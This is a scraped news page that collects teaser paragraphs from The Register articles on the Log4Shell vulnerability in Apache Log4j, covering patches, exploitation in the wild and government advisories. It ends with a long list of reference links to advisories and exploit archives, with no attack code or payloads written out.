Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...

Apache takes off, nukes insecure feature at the heart of Log4j from orbit with v2.16
The Register • Gareth Corfield • 14 Dec 2021

Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed

Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and removes ...

Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching
The Register • Gareth Corfield • 13 Dec 2021

Get our weekly newsletter This might be the bug that deserves the website, logo and book deal

Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones. Israel's Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post. Apache Log4j is an open-source logging utility written in Java that is used all over the world in many software packag...

Log4j RCE: Emergency patch issued to plug critical auth-free code execution hole in widely-used logging utility
The Register • Gareth Corfield • 10 Dec 2021

Get our weekly newsletter Prepare to have a very busy weekend of mitigating and patching

An unauthenticated remote code execution vulnerability in Apache's Log4j Java-based logging tool is being actively exploited, researchers have warned after it was used to execute code on Minecraft servers. Infosec firm Randori summarised the vuln in a blog post, saying: "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation." Crafted proof-of-concept code snippet...

VMware Horizon platform pummeled by Log4j-fueled attacks
The Register • Jeff Burt • 01 Jan 1970

Get our weekly newsletter Miscreants deployed cryptominers, backdoors since late December, Sophos says

VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware. In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos research...

Memory-safe languages so hot right now, agrees Lazarus Group as it slings DLang malware
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Latest offensive cyber group to switch to atypical programming for payloads

Research into Lazarus Group's attacks using Log4Shell has revealed novel malware strains written in an atypical programming language. DLang is among the newer breed of memory-safe languages being endorsed by Western security agencies over the past few years, the same type of language that cyber criminals are switching to. At least three new DLang-based malware strains have been used in attacks on worldwide organizations spanning the manufacturing, agriculture, and physical security industries, C...

It’s time to fill those cloud security gaps
The Register

Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Here’s how Wiz can help

Sponsored Feature When software vulnerabilities and zero days moved up the enterprise worry list 15 years ago, nobody imagined the world would one day end up with a threat as perplexing as Log4Shell – a vulnerability in the Apache Log4j open source logging framework that's used in software on all major operating systems spanning everything from cloud services to PC games. In what might be called the happier days of the past, flaws were something that affected single applications and individual...

Mirai botnet loves exploiting your unpatched TP-Link routers, CISA warns
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs

The US government's Cybersecurity and Infrastructure Security Agency (CISA) is adding three more flaws to its list of known-exploited vulnerabilities, including one involving TP-Link routers that is being targeted by the operators of the notorious Mirai botnet. The other two placed on the list this week involve versions of Oracle's WebLogic Server software and the Apache Foundation's Log4j Java logging library. The command-injection flaw in TP-Link's Archer AX21 Wi-Fi 6 routers – tracked as CV...

Triton malware still a threat to energy sector, FBI warns
The Register • Jessica Lyons Hardcastle • 01 Jan 1970

Get our weekly newsletter Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad

In Brief Triton malware remains a threat to the global energy sector, according to an FBI warning. Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility. The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and control crit...

China's APT40 gang is ready to attack vulns within hours or days of public release.
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Lax patching and vulnerable small biz kit make life easy for Beijing's secret-stealers

Law enforcement agencies from eight nations, led by Australia, have issued an advisory that details the tradecraft used by China-aligned threat actor APT40 – aka Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk – and found it prioritizes developing exploits for newly found vulnerabilities and can target them within hours. The advisory describes APT40 as a "state-sponsored cyber group" and the People's Republic of China (PRC) as that sponsor. The agencies that authored the advis...

Five Eyes nations reveal 2021's fifteen most-exploited flaws
The Register • Jessica Lyons Hardcastle • 01 Jan 1970

Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Malicious cyber actors go after 2021's biggest misses, spend less time on the classics

Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021 , according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies. It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years. Of course, the US Cyb...

LockBit victims in the US alone paid over $90m in ransoms since 2020
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources As America, UK, Canada, Australia and friends share essential bible to detect and thwart infections

Seven nations today issued an alert, plus protection tips, about LockBit, the prolific ransomware-as-a-service gang. The group's affiliates remains a global scourge, costing US victims alone more than $90 million from roughly 1,700 attacks since 2020, we're told. The joint security advisory — issued by the US Cybersecurity and Infrastructure Security Agency (CISA), FBI, Multi-State Information Sharing and Analysis Center (MS-ISAC), and cybersecurity authorities in Australia, Canada, the UK, Ge...

References

CWE-20CWE-400CWE-502https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttps://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdfhttp://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.htmlhttps://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdfhttp://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.htmlhttps://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.mdhttp://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.htmlhttps://www.oracle.com/security-alerts/cpujan2022.htmlhttps://github.com/cisagov/log4j-affected-dbhttps://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001https://support.apple.com/kb/HT213189http://seclists.org/fulldisclosure/2022/Mar/23https://www.oracle.com/security-alerts/cpuapr2022.htmlhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228https://www.nu11secur1ty.com/2021/12/cve-2021-44228.htmlhttp://seclists.org/fulldisclosure/2022/Jul/11http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.htmlhttp://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.htmlhttp://seclists.org/fulldisclosure/2022/Dec/2http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.htmlhttps://logging.apache.org/log4j/2.x/security.htmlhttp://www.openwall.com/lists/oss-security/2021/12/10/1http://www.openwall.com/lists/oss-security/2021/12/10/2http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttps://security.netapp.com/advisory/ntap-20211210-0007/https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbdhttp://www.openwall.com/lists/oss-security/2021/12/10/3https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032https://www.oracle.com/security-alerts/alert-cve-2021-44228.htmlhttp://www.openwall.com/lists/oss-security/2021/12/13/1http://www.openwall.com/lists/oss-security/2021/12/13/2https://twitter.com/kurtseifried/status/1469345530182455296https://lists.debian.org/debian-lts-announce/2021/12/msg00007.htmlhttps://www.debian.org/security/2021/dsa-5020https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdfhttp://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.htmlhttp://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.htmlhttp://www.openwall.com/lists/oss-security/2021/12/14/4https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.htmlhttps://www.kb.cert.org/vuls/id/930724http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.htmlhttp://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.htmlhttp://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.htmlhttp://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.htmlhttp://www.openwall.com/lists/oss-security/2021/12/15/3https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdfhttps://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/https://nvd.nist.govhttps://access.redhat.com/errata/RHSA-2022:0296https://www.cisa.gov/uscert/ics/advisories/icsa-21-357-02https://www.rapid7.com/db/modules/auxiliary/scanner/http/log4shell_scanner/https://www.debian.org/security/2021/dsa-5020